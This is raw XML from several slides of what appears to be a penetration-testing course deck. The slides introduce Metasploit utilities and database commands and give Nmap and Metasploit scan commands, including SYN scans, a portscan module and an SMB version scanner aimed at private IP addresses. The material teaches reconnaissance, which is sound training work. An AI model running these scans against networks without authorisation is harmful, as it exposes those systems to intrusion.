                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991330D5-BD01-F618-DE1C-20B504A6944E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511948" y="2096205"/>
            <a:ext cx="2146742" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning with Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ping scan </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238131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0" y="287082"/>
            <a:ext cx="8647244" cy="960950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Utilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Having covered Metasploit’s three main interfaces, it’s time to cover a few 	utilities. Metasploit’s utilities are direct interfaces to particular features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ar-EG" sz="1800" b="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4ABA326-AF91-29EA-05F9-76A030F9C910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349000" y="1629792"/>
            <a:ext cx="1890261" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSF payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSF encode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSF Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSF Db </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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06268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65817-3ECD-CF5A-2D8E-3B6EFBBBE529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-244698"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Working with Databases in Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBEA2AE2-E957-0DBF-C47A-E31136FE4FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586133" y="1451629"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A1E1CF-EE0D-7820-BB42-25E7083E9593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476517" y="1011463"/>
            <a:ext cx="5123645" cy="3508653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. db_connect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect to an existing data service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. db_disconnect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disconnect from the current data service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_export</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database Export a file contains the contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. db_import</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Import scan result file </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281830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0" y="0"/>
            <a:ext cx="8647244" cy="960950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Importing Nmap Examples</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0656860-5073-5ADB-1EAC-6AC551AE3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442574" y="1179095"/>
            <a:ext cx="8521121" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>db_nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> -A 172.16.32.131</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>msfcourse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 192.168.1.1/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9CC1FD-D01B-98F9-3516-0B27619ABFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36871" y="2032000"/>
            <a:ext cx="4286751"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effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning with Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA36902B-5662-FB74-987A-A496ED28D385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099127" y="2597568"/>
            <a:ext cx="2569934" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>search portscan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use scanner/portscan/syn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Run OR exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A664180F-C7A4-8DB7-B9BB-AB5B3B4DBFA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195033" y="3515247"/>
            <a:ext cx="4378122" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server Message Block Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A94C1912-BFB5-2A58-E1AC-49CAF1763017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767138" y="4133183"/>
            <a:ext cx="7880106" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit can scour a network and attempt to identify versions of Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use scanner/smb/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>smb_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>         show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>         set RHOSTS 192.168.1.155</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         run OR exploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
